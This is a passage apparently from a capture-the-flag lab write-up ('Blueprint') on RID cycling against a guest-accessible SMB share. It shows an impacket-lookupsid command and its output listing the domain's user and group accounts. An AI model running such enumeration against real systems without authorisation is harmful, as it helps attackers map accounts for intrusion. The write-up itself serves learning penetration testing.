RID Cycling


The target SMB server allows guest session with read access to the IPC$ share. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.

┌──(kali㉿kali)-[~/archive/thm/blueprint]
└─$ impacket-lookupsid blah@$IP 100000 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at 10.10.136.191
[*] StringBinding ncacn_np:10.10.136.191[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3130159037-241736515-3168549210
500: BLUEPRINT\Administrator (SidTypeUser)
501: BLUEPRINT\Guest (SidTypeUser)
513: BLUEPRINT\None (SidTypeGroup)
1000: BLUEPRINT\Lab (SidTypeUser)
1001: BLUEPRINT\TelnetClients (SidTypeAlias)

Performing the RID cycling attack with an arbitrary credential against the target SMB service; blahblah Lab account has been identified.